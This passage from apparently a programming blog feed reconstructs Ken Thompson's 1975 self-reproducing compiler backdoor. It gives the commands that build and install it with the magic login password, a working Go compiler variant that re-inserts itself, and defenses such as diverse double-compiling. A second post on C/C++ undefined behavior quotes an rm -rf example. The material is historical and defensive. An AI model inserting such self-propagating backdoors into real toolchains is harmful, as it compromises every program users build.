class=l> <p>Replace each space before a byte value<br> with a newline and a leading <code>0</code>.<br> Now all the octal values are C octal constants. <td class=r><pre> 1,$s/ 0*/\ 0/g </pre> <tr> <td class=l> <p>Delete 0 values caused by odd-length padding<br> or by the final offset-only line. <td class=r><pre> g/^0$/d </pre> <tr> <td class=l> <p>Add trailing commas to each line. <td class=r><pre> 1,$s/$/,/ </pre> <tr> <td class=l> <p>Write <code>x</code> and switch to <code>nih.c</code>. <td class=r><pre> w x e nih.c </pre> <tr> <td class=l> <p>Move to and delete the magic <code>%0</code> line. <td class=r><pre> /%/d </pre> <tr> <td class=l> <p>Read <code>x</code> (the octal values) into the file there. <td class=r><pre> .-1r x </pre> <tr> <td class=l> <p>Add a trailing <code>0</code> to end the array. <td class=r><pre> .a 0 . </pre> <tr> <td class=l> <p>Write <code>nih.c</code> and quit. All done! <td class=r><pre> w nih.c q </pre> <tr> <td class=l> <p>Let’s run <code>rc</code>.<br> The numbers are <code>ed</code> printing file sizes<br> each time it reads or writes a file. <td class=r><pre> % <b>sh rc</b> 1314 1163 5249 6414 1163 6414 7576 </pre> <tr> <td class=l> <p>Let’s check the output, <code>nih.c</code>.<br> The tabs are gone and the octal bytes are there! <td class=r><pre> % <b>cat nih.c</b> nihflg; codenih() { char *p,*s; int i; if(pflag) return; <span class="reg">...</span> char nihstr[] { 0156, 0151, 0150, 0146, <span class="reg">...</span> 0175, 012, 0175, 012, 0 }; repronih() { int i,n,c; <span class="reg">...</span> </pre> <tr> <td class=l> <p>Let’s make an evil compiler,<br> applying the <code>codenih</code> changes by hand. <td class=r><pre> % <b>cp /usr/source/s1/cc.c cc.c</b> % <b>cp cc.c ccevil.c</b> % <b>ed ccevil.c</b> 12902 </pre> <tr> <td class=l> <p>Add <code>codenih</code> after <code>getline</code>. <td class=r><pre> <b>/getline/</b> while(getline()) { <b>s/$/ codenih();/</b> <b>.</b> while(getline()) { codenih(); </pre> <tr> <td class=l> <p>Add <code>repronih</code> after <code>fflush</code>. <td class=r><pre> <b>/fflush/</b> fflush(obuf); <b>s/$/ repronih();/</b> <b>.</b> fflush(obuf); repronih(); </pre> <tr> <td class=l> <p>Add <code>nih.c</code> at the end of the file. <td class=r><pre> <b>$r nih.c</b> 7576 <b>w</b> 20501 <b>q</b> </pre> <tr> <td class=l> <p>Build the evil and good code with the good <code>cc</code>. <td class=r><pre> % <b>cc ccevil.c; mv a.out ccevil</b> % <b>cc cc.c; mv a.out ccgood</b> % <b>ls -l ccevil ccgood</b> -rwxrwxrwx 1 ken 12918 Aug 14 22:19 ccevil -rwxrwxrwx 1 ken 10724 Aug 14 22:19 ccgood </pre> <tr> <td class=l> <p>The good compiler still compiles<br> the original <code>cc.c</code> correctly. <td class=r><pre> % <b>ccgood cc.c</b> % <b>ls -l a.out</b> -rwxrwxrwx 1 ken 10724 Aug 14 22:19 a.out </pre> <tr> <td class=l> <p>The evil compiler compiles<br> the original <code>cc.c</code> with the backdoor:<br> 12,918 bytes instead of 10,724. <td class=r><pre> % <b>ccevil cc.c</b> % <b>ls -l a.out</b> -rwxrwxrwx 1 ken 12918 Aug 14 22:19 a.out </pre> <tr> <td class=l> <p>The evil compilers don’t match exactly,<br> but only because the binary contains the name of<br> the source file (<code>ccevil.c</code> versus <code>cc.c</code>).<br> One more round will converge them. <td class=r><pre> % <b>cmp a.out ccevil</b> a.out ccevil differ: char 9428, line 377 % <b>cmp -l a.out ccevil</b> 9428 56 145 9429 157 166 9430 0 151 9431 0 154 9432 0 56 9433 0 157 % <b>cp a.out ccevil</b> % <b>ccevil cc.c</b> % <b>cmp a.out ccevil</b> % </pre> <tr> <td class=l> <p>Let’s install the evil compiler. <td class=r><pre> % <b>su</b> password: <b>root</b> # <b>cp ccevil /bin/cc</b> </pre> <tr> <td class=l> <p>Let’s rebuild everything from clean sources.<br> The compiler still contains the backdoor.<br> <td class=r><pre> # <b>cc /usr/source/s1/cc.c</b> # <b>cp a.out /bin/cc</b> # <b>ls -l /bin/cc</b> -rwxrwxr-x 1 bin 12918 Aug 14 22:30 /bin/cc # <b>cc /usr/source/s1/login.c</b> # <b>cp a.out /bin/login</b> # ^D </pre> <tr> <td class=l> <p>Now we can log in as root<br> with the magic password. <td class=r><pre> % ^D login: <b>root</b> Password: <b>codenih</b> # <b>who</b> root tty8 Aug 14 22:32 # </pre> </table> <a class=anchor href="#timeline"><h2 id="timeline">Timeline</h2></a> <p> This code can be dated to some time in the one-year period from June 1974 to June 1975, probably early 1975. </p> <p> The code does not work in V5 Unix, released in June 1974. At the time, the C preprocessor code only processed input files that began with the first character ‘#’. The backdoor is in the preprocessor, and the V5 <code>cc.c</code> did not start with ‘#’ and so wouldn’t have been able to modify itself. The <a href="https://seclab.cs.ucdavis.edu/projects/history/papers/karg74.pdf">Air Force review of Multics security</a> that Ken credits for inspiring the backdoor is also dated June 1974. So the code post-dates June 1974. </p> <p> Although it wasn’t used in V6, the archive records the modification time (mtime) of each file it contains. We can read the mtime directly from the archive using a modern Unix system: </p> <pre> % hexdump -C nih.a 00000000 6d ff 78 2e 63 00 00 00 00 00 <b>46 0a 6b 64</b> 06 b6 |m.x.c.....F.kd..| 00000010 22 05 6e 69 68 66 6c 67 3b 0a 63 6f 64 65 6e 69 |".nihflg;.codeni| ... 00000530 7d 0a 7d 0a 72 63 00 00 00 00 00 00 <b>46 0a eb 5e</b> |}.}.rc......F..^| 00000540 06 b6 8d 00 65 64 20 78 2e 63 0a 31 2c 24 73 2f |....ed x.c.1,$s/| % date -r 0x0a46646b # BSD date. On Linux: date -d @$((0x0a46646b)) Thu Jun 19 00:49:47 EDT 1975 % date -r 0x0a465eeb Thu Jun 19 00:26:19 EDT 1975 % </pre> <p> So the code was done by June 1975. </p> <a class=anchor href="#deployment"><h2 id="deployment">Controlled Deployment</h2></a> <p> In addition to the quote above from the Q&A, the story of the deployment of the backdoor has been told publicly many times (<a href="https://groups.google.com/g/net.lang.c/c/kYhrMYcOd0Y/m/u_D2lWAUCQoJ">1</a> <a href="https://niconiconi.neocities.org/posts/ken-thompson-really-did-launch-his-trusting-trust-trojan-attack-in-real-life/">2</a> <a href="https://www.tuhs.org/pipermail/tuhs/2021-September/024478.html">3</a> <a href="https://www.tuhs.org/pipermail/tuhs/2021-September/024485.html">4</a> <a href="https://www.tuhs.org/pipermail/tuhs/2021-September/024486.html">5</a> <a href="https://www.tuhs.org/pipermail/tuhs/2021-September/024487.html">6</a> <a href="https://www.tuhs.org/pipermail/tuhs/2021-November/024657.html">7</a>), sometimes with conflicting minor details. Based on these many tellings, it seems clear that it was the <a href="https://en.wikipedia.org/wiki/PWB/UNIX">PWB group</a> (not <a href="https://gunkies.org/wiki/USG_UNIX">USG</a> as sometimes reported) that was induced to copy the backdoored C compiler, that eventually the login program on that system got backdoored too, that PWB discovered something was amiss because the compiler got bigger each time it compiled itself, and that eventually they broke the reproduction and ended up with a clean compiler. <p> John Mashey tells the story of the PWB group obtaining and discovering the backdoor and then him overhearing Ken and Robert H. Morris discussing it (<a href="https://groups.google.com/g/net.lang.c/c/W4Oj3EVAvNc/m/XPAtApNycLUJ">1</a> <a href="https://mstdn.social/@JohnMashey/109991275086879095">2</a> <a href="https://archive.computerhistory.org/resources/access/text/2018/10/102738835-05-01-acc.pdf">3</a> (pp. 29-30) <a href="https://www.youtube.com/watch?v=Vd7aH2RrcTc&t=4776s">4</a>). In Mashey’s telling, PWB obtained the backdoor weeks after he read John Brunner’s classic book <i>Shockwave Rider</i>, which was published in early 1975. (It appeared in the “New Books” list in the <i>New York Times</i> on March 5, 1975 (p. 37).) <p> All tellings of this story agree that the compiler didn’t make it any farther than PWB. Eric S. Raymond’s Jargon File contains <a href="http://www.catb.org/jargon/html/B/back-door.html">an entry for backdoor</a> with rumors to the contrary. After describing Ken’s work, it says:</p> <blockquote> Ken says the crocked compiler was never distributed. Your editor has heard two separate reports that suggest that the crocked login did make it out of Bell Labs, notably to BBN, and that it enabled at least one late-night login across the network by someone using the login name “kt”. </blockquote> <p>I mentioned this to Ken, and he said it could not have gotten to BBN. The technical details don’t line up either: as we just saw, the login change only accepts “codenih” as a password for an account that already exists. So the Jargon File story is false. </p> <p>Even so, it turns out that the backdoor did leak out in one specific sense. In 1997, Dennis Ritchie gave Warren Toomey (curator of the TUHS archive) a collection of old tape images. Some bits were posted then, and others were held back. In July 2023, Warren <a href="https://www.tuhs.org/Archive/Applications/Dennis_Tapes/">posted</a> and <a href="https://www.tuhs.org/pipermail/tuhs/2023-July/028590.html">announced</a> the full set. One of the tapes contains various files from Ken, which Dennis had described as “A bunch of interesting old ken stuff (eg a version of the units program from the days when the dollar fetched 302.7 yen).” Unnoticed in those files is <code>nih.a</code>, dated July 3, 1975. When I wrote to Ken, he sent me a slightly different <code>nih.a</code>: it contained the exact same files, but dated January 28, 1998, and in the modern textual archive format rather than the binary V6 format. The V6 simulator contains the <code>nih.a</code> from Dennis’s tapes. </p> <a class=anchor href="#buggy"><h2 id="buggy">A Buggy Version</h2></a> <p> The backdoor was noticed because the compiler got one byte larger each time it compiled itself. About a decade ago, Ken told me that it was an extra NUL byte added to a string each time, “just a bug.” We can see which string constant it must have been (<code>nihstr</code>), but the version we just built does not have that bug—Ken says he didn’t save the buggy version. An interesting game would be to try to reconstruct the most plausible diff that reintroduces the bug. </p> <p> It seems to me that to add an extra NUL byte each time, you need to use <code>sizeof</code> to decide when to stop the iteration, instead of stopping at the first NUL. My best attempt is: </p> <pre> repronih() { int i,n,c; if(nihflg!=3) return; <span class=del>- n=0;</span> <span class=del>- i=0;</span> <span class=del>- for(;;)</span> <span class=ins>+ for(n=0; n&lt;5; n++)</span> <span class=ins>+ for(i=0; i&lt;sizeof nihstr; )</span> switch(c=nihstr[i++]){ case 045: n++; if(n==1) i=0; if(n!=2) continue; default: if(n==1||n==2){ putc('0',obuf); if(c>=0100) putc((c>>6)+'0',obuf); if(c>=010) putc(((c>>3)&7)+'0',obuf); putc((c&7)+'0',obuf); putc(',',obuf); putc('\n',obuf); continue; } if(n!=3) putc(c,obuf); continue; <span class=del>- case 0:</span> <span class=del>- n++;</span> <span class=del>- i=0;</span> <span class=del>- if(n==5){</span> <span class=del>- fflush(obuf);</span> <span class=del>- return;</span> <span class=del>- }</span> } <span class=ins>+ fflush(obuf);</span> } </pre> <p> I doubt this was the actual buggy code, though: it’s too structured compared to the fixed version. And if the code had been written this way, it would have been easier to remove the 0 being added in the <code>rc</code> script than to complicate the code. But maybe. </p> <p> Also note that the compiler cannot get one byte larger each time it compiles itself, because V6 Unix binaries were rounded up to a 2-byte boundary. While <code>nihstr</code> gets one byte larger each time, the compiler binary gets two bytes larger every second time. </p> <a class=anchor href="#modern"><h2 id="modern">A Modern Version</h2></a> <p> Even seeing the code run in the V6 simulator, it can be easy to mentally dismiss this kind of backdoor as an old problem. Here is a more modern variant. </p> <p> The Go compiler reads input files using a routine called <code>Parse</code> in the package <code>cmd/compile/internal/syntax</code>. The input is abstracted as an <code>io.Reader</code>, so if we want to replace the input, we need to interpose a new reader. We can do that easily enough: </p> <pre> var p parser <span class=ins>+ src = &evilReader{src: src}</span> p.init(base, src, errh, pragh, mode) </pre> <p> Then we need to implement <code>evilReader</code>, which is not too difficult either: </p> <pre> type evilReader struct { src io.Reader data []byte err error } func (r *evilReader) Read(b []byte) (int, error) { if r.data == nil { data, err := io.ReadAll(r.src) s := string(data) if evilContains(s, "package main") && evilContains(s, "\"hello, world\\n\"") { s = evilReplace(s, "\"hello, world\\n\"", "\"backdoored!\\n\"") } if evilContains(s, "package syntax") && evilContains(s, "\nfunc Parse(base *PosBase, src io.Reader") { s = evilReplace(s, "p.init(base, src, errh, pragh, mode)", "src=&evilReader{src:src}; p.init(base, src, errh, pragh, mode)") s += evilSource() } r.data = []byte(s) r.err = err } if r.err != nil { return 0, r.err } n := copy(b, r.data) r.data = r.data[n:] if n == 0 { return 0, io.EOF } return n, nil } </pre> <p> The first replacement rewrites a “hello, world” program to a “backdoored!” program. The second replacement reproduces the change inside the compiler. To make this work inside the compiler, we need <code>evilSource</code> to return the source code of the <code>evilReader</code>, which we know how to do. The <code>evilContains</code> and <code>evilReplace</code> functions are reimplementations of <code>strings.Contains</code> and <code>strings.Replace</code>, since the code in question does not import <code>strings</code>, and the build system may not have provided it for the compiler to import. </p> <p> Completing the code: </p> <pre> func evilIndex(s, t string) int { for i := 0; i &lt; len(s)-len(t); i++ { if s[i:i+len(t)] == t { return i } } return -1 } func evilContains(s, t string) bool { return evilIndex(s, t) >= 0 } func evilReplace(s, old, new string) string { i := evilIndex(s, old) if i &lt; 0 { return s } return s[:i] + new + s[i+len(old):] } func evilSource() string { return "\n\n" + evilText + "\nvar evilText = \x60" + evilText + "\x60\n" } var evilText = <span class=string>` type evilReader struct { src io.Reader data []byte err error } ... func evilSource() string { return "\n\n" + evilText + "\nvar evilText = \x60" + evilText + "\x60\n" } `</span> </pre> <p> Now we can install it, delete the source code changes, and install the compiler from clean sources. The change persists: </p> <pre> % go install cmd/compile % git stash Saved working directory ... % git diff # source is clean! % go install cmd/compile % cat >x.go package main func main() { print("hello, world\n") } ^D % go run x.go backdoored! % </pre> <a class=anchor href="#reflections"><h2 id="reflections">Reflections on Reflections</h2></a> <p>With all that experience behind us, a few observations from the vantage point of 2023. <p><a class=anchor href="#short"><b id=short>It’s short!</b></a> When Ken sent me <code>nih.a</code> and I got it running, my immediate reaction was disbelief at the size of the change: 99 lines of code, plus a 20-line shell script. If you already know how to make a program print itself, the biggest surprise is that there are no surprises! <p> It’s one thing to say “I know how to do it in theory” and quite another to see how small and straightforward the backdoor is in practice. In particular, hooking into source code reading makes it trivial. Somehow, I’d always imagined some more complex pattern matching on an internal representation in the guts of the compiler, not a textual substitution. Seeing it run, and seeing how tiny it is, really drives home how easy it would be to make a change like this and how important it is to build from trusted sources using trusted tools. <p> I don’t say any of this to put down Ken’s doing it in the first place: it seems easy <i>because</i> he did it and explained it to us. But it’s still very little code for an extremely serious outcome. <p><a class=anchor href="#go"><b id=go>Bootstrapping Go</b></a>. In the early days of working on and talking about <a href="https://go.dev/">Go</a>, people often asked us why the Go compiler was written in C, not Go. The real reason is that we wanted to spend our time making Go a good language for distributed systems and not on making it a good language for writing compilers, but we would also jokingly respond that people wouldn’t trust a self-compiling compiler from Ken. After all, he had ended his Turing lecture by saying: </p> <blockquote> The moral is obvious. You can’t trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code. </blockquote> <p> Today, however, the Go compiler does compile itelf, and that prompts the important question of why it should be trusted, especially when a backdoor is so easy to add. The answer is that we have never required that the compiler rebuild itself. Instead the compiler always builds from an earlier released version of the compiler. This way, anyone can reproduce the current binaries by starting with Go 1.4 (written in C), using Go 1.4 to compile Go 1.5, Go 1.5 to compile Go 1.6, and so on. There is no point in the cycle where the compiler is required to compile itself, so there is no place for a binary-only backdoor to hide. In fact, we recently published programs to make it easy to rebuild and verify the Go toolchains, and we demonstrated how to use them to verify one version of Ubuntu’s Go toolchain without using Ubuntu at all. See “<a href="https://go.dev/blog/rebuild">Perfectly Reproducible, Verified Go Toolchains</a>” for details. </p> <p><a class=anchor href="#ddc"><b id=ddc>Bootstrapping Trust</b></a>. An important advancement since 1983 is that we know a defense against this backdoor, which is to build the compiler source two different ways. <p> <img name="ddc" class="center pad" width=482 height=245 src="ddc.png" srcset="ddc.png 1x, ddc@2x.png 2x"> <p> Specifically, suppose we have the suspect binary – compiler 1 – and its source code. First, we compile that source code with a trusted second compiler, compiler 2, producing compiler 2.1. If everything is on the up-and-up, compiler 1 and compiler 2.1 should be semantically equivalent, even though they will be very different at the binary level, since they were generated by different compilers. Also, compiler 2.1 cannot contain a binary-only backdoor inserted by compiler 1, since it wasn’t compiled with that compiler. Now we compile the source code again with both compiler 1 and compiler 2.1. If they really are semantically equivalent, then the outputs, compilers 1.1 and 2.1.1, should be bit-for-bit identical. If that’s true, then we’ve established that compiler 1 does not insert any backdoors when compiling itself. </p> <p> The great thing about this process is that we don’t even need to know which of compiler 1 and 2 might be backdoored. If compilers 1.1 and 2.1.1 are identical, then they’re either both clean or both backdoored the same way. If they are independent implementations from independent sources, the chance of both being backdoored the same way is far less likely than the chance of compiler 1 being backdoored. We’ve bootstrapped trust in compiler 1 by comparing it against compiler 2, and vice versa. </p> <p> Another great thing about this process is that compiler 2 can be a custom, small translator that’s incredibly slow and not fully general but easier to verify and trust. All that matters is that it can run well enough to produce compiler 2.1, and that the resulting code runs well enough to produce compiler 2.1.1. At that point, we can switch back to the fast, fully general compiler 1. </p> <p> This approach is called “diverse double-compiling,” and the definitive reference is <a href="https://dwheeler.com/trusting-trust/">David A. Wheeler’s PhD thesis and related links</a>. </p> <p><a class=anchor href="#repro"><b id=repro>Reproducible Builds</b></a>. Diverse double-compiling and any other verifying of binaries by rebuilding source code depends on builds being reproducible. That is, the same inputs should produce the same outputs. Computers being deterministic, you’d think this would be trivial, but in modern systems it is not. We saw a tiny example above, where compiling the code as <code>ccevil.c</code> produced a different binary than compiling the code as <code>cc.c</code> because the compiler embedded the file name in the executable. Other common unwanted build inputs include the current time, the current directory, the current user name, and many others, making a reproducible build far more difficult than it should be. The <a href="https://reproducible-builds.org/">Reproducible Builds</a> project collects resources to help people achieve this goal. </p> <p><a class=anchor href="#modern"><b id=modern>Modern Security</b></a>. In many ways, computing security has regressed since the Air Force report on Multics was written in June 1974. It suggested requiring source code as a way to allow inspection of the system on delivery, and it raised this kind of backdoor as a potential barrier to that inspection. Half a century later, we all run binaries with no available source code at all. Even when source is available, as in open source operating systems like Linux, approximately no one checks that the distributed binaries match the source code. The programming environments for languages like Go, NPM, and Rust make it trivial to download and run source code published by <a href="deps">strangers on the internet</a>, and again almost no one is checking the code, until there is a problem. No one needs Ken’s backdoor: there are far easier ways to mount a supply chain attack. <p> On the other hand, given all our reckless behavior, there are far fewer problems than you would expect. Quite the opposite: we trust computers with nearly every aspect of our lives, and for the most part nothing bad happens. Something about our security posture must be better than it seems. Even so, it might be nicer to live in a world where the only possible attacks required the sophistication of approaches like Ken’s (like in this <a href="https://www.teamten.com/lawrence/writings/coding-machines/">excellent science fiction story</a>). </p> <p> We still have work to do. </p> C and C++ Prioritize Performance over Correctness tag:research.swtch.com,2012:research.swtch.com/ub 2023-08-18T12:00:00-04:00 2023-08-18T12:02:00-04:00 The meaning of “undefined behavior” has changed significantly since its introduction in the 1980s. <p> The original ANSI C standard, C89, introduced the concept of “undefined behavior,” which was used both to describe the effect of outright bugs like accessing memory in a freed object and also to capture the fact that existing implementations differed about handling certain aspects of the language, including use of uninitialized values, signed integer overflow, and null pointer handling. <p> The C89 spec defined undefined behavior (in section 1.6) as:<blockquote> <p> Undefined behavior—behavior, upon use of a nonportable or erroneous program construct, of erroneous data, or of indeterminately-valued objects, for which the Standard imposes no requirements. Permissible undefined behavior ranges from ignoring the situation completely with unpredictable results, to behaving during translation or program execution in a documented manner characteristic of the environment (with or without the issuance of a diagnostic message), to terminating a translation or execution (with the issuance of a diagnostic message).</blockquote> <p> Lumping both non-portable and buggy code into the same category was a mistake. As time has gone on, the way compilers treat undefined behavior has led to more and more unexpectedly broken programs, to the point where it is becoming difficult to tell whether any program will compile to the meaning in the original source. This post looks at a few examples and then tries to make some general observations. In particular, today’s C and C++ prioritize performance to the clear detriment of correctness. <a class=anchor href="#uninit"><h2 id="uninit">Uninitialized variables</h2></a> <p> C and C++ do not require variables to be initialized on declaration (explicitly or implicitly) like Go and Java. Reading from an uninitialized variable is undefined behavior. <p> In a <a href="http://blog.llvm.org/2011/05/what-every-c-programmer-should-know.html">blog post</a>, Chris Lattner (creator of LLVM and Clang) explains the rationale:<blockquote> <p> <b>Use of an uninitialized variable</b>: This is commonly known as source of problems in C programs and there are many tools to catch these: from compiler warnings to static and dynamic analyzers. This improves performance by not requiring that all variables be zero initialized when they come into scope (as Java does). For most scalar variables, this would cause little overhead, but stack arrays and malloc’d memory would incur a memset of the storage, which could be quite costly, particularly since the storage is usually completely overwritten.</blockquote> <p> Early C compilers were too crude to detect use of uninitialized basic variables like integers and pointers, but modern compilers are dramatically more sophisticated. They could absolutely react in these cases by “terminating a translation or execution (with the issuance of a diagnostic message),” which is to say reporting a compile error. Or, if they were worried about not rejecting old programs, they could insert a zero initialization with, as Lattner admits, little overhead. But they don’t do either of these. Instead, they just do whatever they feel like during code generation. <p> <p> For example, here’s a simple C++ program with an uninitialized variable (a bug): <pre>#include &lt;stdio.h&gt; int main() { for(int i; i &lt; 10; i++) { printf("%d\n", i); } return 0; } </pre> <p> If you compile this with <code>clang++</code> <code>-O1</code>, it deletes the loop entirely: <code>main</code> contains only the <code>return</code> <code>0</code>. In effect, Clang has noticed the uninitialized variable and chosen not to report the error to the user but instead to pretend <code>i</code> is always initialized above 10, making the loop disappear. <p> It is true that if you compile with <code>-Wall</code>, then Clang does report the use of the uninitialized variable as a warning. This is why you should always build with and fix warnings in C and C++ programs. But not all compiler-optimized undefined behaviors are reliably reported as warnings. <a class=anchor href="#overflow"><h2 id="overflow">Arithmetic overflow</h2></a> <p> At the time C89 was standardized, there were still legacy <a href="https://en.wikipedia.org/wiki/Ones%27_complement">ones’-complement computers</a>, so ANSI C could not assume the now-standard two’s-complement representation for negative numbers. In two’s complement, an <code>int8</code> −1 is 0b11111111; in ones’ complement that’s −0, while −1 is 0b11111110. This meant that operations like signed integer overflow could not be defined, because<blockquote> <p> <code>int8</code> 127+1 = 0b01111111+1 = 0b10000000</blockquote> <p> is −127 in ones’ complement but −128 in two’s complement. That is, signed integer overflow was non-portable. Declaring it undefined behavior let compilers escalate the behavior from “non-portable”, with one of two clear meanings, to whatever they feel like doing. For example, a common thing programmers expect is that you can test for signed integer overflow by checking whether the result is less than one of the operands, as in this program: <pre>#include &lt;stdio.h&gt; int f(int x) { if(x+100 &lt; x) printf("overflow\n"); return x+100; } </pre> <p> Clang optimizes away the <code>if</code> statement. The justification is that since signed integer overflow is undefined behavior, the compiler can assume it never happens, so <code>x+100</code> must never be less than <code>x</code>. Ironically, this program would correctly detect overflow on both ones’-complement and two’s-complement machines if the compiler would actually emit the check. <p> In this case, <code>clang++</code> <code>-O1</code> <code>-Wall</code> prints no warning while it deletes the <code>if</code> statement, and neither does <code>g++</code>, although I seem to remember it used to, perhaps in subtly different situations or with different flags. <p> For C++20, the <a href="http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2018/p0907r0.html">first version of proposal P0907</a> suggested standardizing that signed integer overflow wraps in two’s complement. The original draft gave a very clear statement of the history of the undefined behavior and the motivation for making a change:<blockquote> <p> [C11] Integer types allows three representations for signed integral types: <ul> <li> Signed magnitude <li> Ones’ complement <li> Two’s complement</ul> <p> See §4 C Signed Integer Wording for full wording. <p> C++ inherits these three signed integer representations from C. To the author’s knowledge no modern machine uses both C++ and a signed integer representation other than two’s complement (see §5 Survey of Signed Integer Representations). None of [MSVC], [GCC], and [LLVM] support other representations. This means that the C++ that is taught is effectively two’s complement, and the C++ that is written is two’s complement. It is extremely unlikely that there exist any significant code base developed for two’s complement machines that would actually work when run on a non-two’s complement machine. <p> The C++ that is spec’d, however, is not two’s complement. Signed integers currently allow for trap representations, extra padding bits, integral negative zero, and introduce undefined behavior and implementation-defined behavior for the sake of this extremely abstract machine. <p> Specifically, the current wording has the following effects: <ul> <li> Associativity and commutativity of integers is needlessly obtuse. <li> Naïve overflow checks, which are often security-critical, often get eliminated by compilers. This leads to exploitable code when the intent was clearly not to and the code, while naïve, was correctly performing security checks for two’s complement integers. Correct overflow checks are difficult to write and equally difficult to read, exponentially so in generic code. <li> Conversion between signed and unsigned are implementation-defined. <li> There is no portable way to generate an arithmetic right-shift, or to sign-extend an integer, which every modern CPU supports. <li> constexpr is further restrained by this extraneous undefined behavior. <li> Atomic integral are already two’s complement and have no undefined results, therefore even freestanding implementations already support two’s complement in C++.</ul> <p> Let’s stop pretending that the C++ abstract machine should represent integers as signed magnitude or ones’ complement. These theoretical implementations are a different programming language, not our real-world C++. Users of C++ who require signed magnitude or ones’ complement integers would be better served by a pure-library solution, and so would the rest of us.</blockquote> <p> In the end, the C++ standards committee put up “strong resistance against” the idea of defining signed integer overflow the way every programmer expects; the undefined behavior remains. <a class=anchor href="#loops"><h2 id="loops">Infinite loops</h2></a> <p> A programmer would never accidentally cause a program to execute an infinite loop, would they? Consider this program: <pre>#include &lt;stdio.h&gt; int stop = 1; void maybeStop() { if(stop) for(;;); } int main() { printf("hello, "); maybeStop(); printf("world\n"); } </pre> <p> This seems like a completely reasonable program to write. Perhaps you are debugging and want the program to stop so you can attach a debugger. Changing the initializer for <code>stop</code> to <code>0</code> lets the program run to completion. But it turns out that, at least with the latest Clang, the program runs to completion anyway: the call to <code>maybeStop</code> is optimized away entirely, even when <code>stop</code> is <code>1</code>. <p> The problem is that C++ defines that every side-effect-free loop may be assumed by the compiler to terminate. That is, a loop that does not terminate is therefore undefined behavior. This is purely for compiler optimizations, once again treated as more important than correctness. The rationale for this decision played out in the C standard and was more or less adopted in the C++ standard as well. <p> John Regehr pointed out this problem in his post “<a href="https://blog.regehr.org/archives/140">C Compilers Disprove Fermat’s Last Theorem</a>,” which included this entry in a FAQ:<blockquote> <p> Q: Does the C standard permit/forbid the compiler to terminate infinite loops? <p> A: The compiler is given considerable freedom in how it implements the C program, but its output must have the same externally visible behavior that the program would have when interpreted by the “C abstract machine” that is described in the standard. Many knowledgeable people (including me) read this as saying that the termination behavior of a program must not be changed. Obviously some compiler writers disagree, or else don’t believe that it matters. The fact that reasonable people disagree on the interpretation would seem to indicate that the C standard is flawed.</blockquote> <p> A few months later, Douglas Walls wrote <a href="http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1509.pdf">WG14/N1509: Optimizing away infinite loops</a>, making the case that the standard should <i>not</i> allow this optimization. In response, Hans-J. Boehm wrote <a href="http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1528.htm">WG14/N1528: Why undefined behavior for infinite loops?</a>, arguing for allowing the optimization. <p> Consider the potential optimization of this code: <pre>for (p = q; p != 0; p = p-&gt;next) ++count; for (p = q; p != 0; p = p-&gt;next) ++count2; </pre> <p> A sufficiently smart compiler might reduce it to this code: <pre>for (p = q; p != 0; p = p-&gt;next) { ++count; ++count2; } </pre> <p> Is that safe? Not if the first loop is an infinite loop. If the list at <code>p</code> is cyclic and another thread is modifying <code>count2</code>, then the first program has no race, while the second program does. Compilers clearly can’t turn correct, race-free programs into racy programs. But what if we declare that infinite loops are not correct programs? That is, what if infinite loops were undefined behavior? Then the compiler could optimize to its robotic heart’s content. This is exactly what the C standards committee decided to do. <p> The rationale, paraphrased, was: <ul> <li> It is very difficult to tell if a given loop is infinite. <li> Infinite loops are rare and typically unintentional. <li> There are many loop optimizations that are only valid for non-infinite loops. <li> The performance wins of these optimizations are deemed important. <li> Some compilers already apply these optimizations, making infinite loops non-portable too. <li> Therefore, we should declare programs with infinite loops undefined behavior, enabling the optimizations.</ul> <a class=anchor href="#null"><h2 id="null">Null pointer usage</h2></a> <p> We’ve all seen how dereferencing a null pointer causes a crash on modern operating systems: they leave page zero unmapped by default precisely for this purpose. But not all systems where C and C++ run have hardware memory protection. For example, I wrote my first C and C++ programs using Turbo C on an MS-DOS system. Reading or writing a null pointer did not cause any kind of fault: the program just touched the memory at location zero and kept running. The correctness of my code improved dramatically when I moved to a Unix system that made those programs crash at the moment of the mistake. Because the behavior is non-portable, though, dereferencing a null pointer is undefined behavior. <p> At some point, the justification for keeping the undefined behavior became performance. <a href="http://blog.llvm.org/2011/05/what-every-c-programmer-should-know.html">Chris Lattner explains</a>:<blockquote> <p> In C-based languages, NULL being undefined enables a large number of simple scalar optimizations that are exposed as a result of macro expansion and inlining.</blockquote> <p> In <a href="plmm#ub">an earlier post</a>, I showed this example, lifted from <a href="https://twitter.com/andywingo/status/903577501745770496">Twitter in 2017</a>: <pre>#include &lt;cstdlib&gt; typedef int (*Function)(); static Function Do; static int EraseAll() { return system("rm -rf slash"); } void NeverCalled() { Do = EraseAll; } int main() { return Do(); } </pre> <p> Because calling <code>Do()</code> is undefined behavior when <code>Do</code> is null, a modern C++ compiler like Clang simply assumes that can’t possibly be what’s happening in <code>main</code>. Since <code>Do</code> must be either null or <code>EraseAll</code> and since null is undefined behavior, we might as well assume <code>Do</code> is <code>EraseAll</code> unconditionally, even though <code>NeverCalled</code> is never called. So this program can be (and is) optimized to: <pre>int main() { return system("rm -rf slash"); } </pre> <p> Lattner gives <a href="https://blog.llvm.org/2011/05/what-every-c-programmer-should-know_14.html">an equivalent example</a> (search for <code>FP()</code>) and then this advice:<blockquote> <p> The upshot is that it is a fixable issue: if you suspect something weird is going on like this, try building at -O0, where the compiler is much less likely to be doing any optimizations at all.</blockquote> <p> This advice is not uncommon: if you cannot debug the correctness problems in your C++ program, disable optimizations. <a class=anchor href="#sort"><h2 id="sort">Crashes out of sorts</h2></a> <p> C++’s <code>std::sort</code> sorts a collection of values (abstracted as a random access iterator, but almost always an array) according to a user-specified comparison function. The default function is <code>operator&lt;</code>, but you can write any function. For example if you were sorting instances of class <code>Person</code> your comparison function might sort by the <code>LastName</code> field, breaking ties with the <code>FirstName</code> field. These comparison functions end up being subtle yet boring to write, and it’s easy to make a mistake. If you do make a mistake and pass in a comparison function that returns inconsistent results or accidentally reports that any value is less than itself, that’s undefined behavior: <code>std::sort</code> is now allowed to do whatever it likes, including walking off either end of the array and corrupting other memory. If you’re lucky, it will pass some of this memory to your comparison function, and since it won’t have pointers in the right places, your comparison function will crash. Then at least you have a chance of guessing the comparison function is at fault. In the worst case, memory is silently corrupted and the crash happens much later, with <code>std::sort</code> is nowhere to be found. <p> Programmers make mistakes, and when they do, <code>std::sort</code> corupts 